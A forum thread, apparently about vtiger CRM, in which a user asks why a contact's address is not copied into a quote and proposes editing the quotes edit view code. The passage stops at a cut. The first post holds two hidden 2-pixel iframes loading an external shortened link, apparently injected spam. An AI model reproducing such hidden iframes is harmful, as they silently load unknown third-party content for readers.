when i choose a contact in quote module, his adress is not added in adress'fields.
It's OK with accout adress.
Is there a bug or is there something I do wrong.
Thanks in advance. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
we copy the address associated with the account when creating the quote and not the address of the contact or potential.
vtiger team
do you know a possibility to do that ?
i fact, i manage some customers that own several sales subsidaries. i can send quotes directly to the subsidaries, that is in vtiger a contact with a dedicated adress. if the quote is accepted, i will send sales order to the contact. the invoice adress wil be headquarter's adress, and the shipment adress will be the adress of the subsudary, or the adress of its customer.
and there is something strange. when we select the account, vtiger asks if we want to replace the adress by the adress of the account !! how to explain it.
thanks for your answer.
this is very interesting to can select account adress or contact adress.
prasad do you think there is a possibility for it?
thanks .
we will look at this requirement as a enhancement.
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kindly bear with us in the mean time.
vtiger team
is it corect if i change the code in file quote\editview.php
line 74 // get account address if vtiger_account is given
if we replace accounts elements per contact elements, will it be ok ?
in the file modules\quotes\editview.php
ligne 74 replace the code with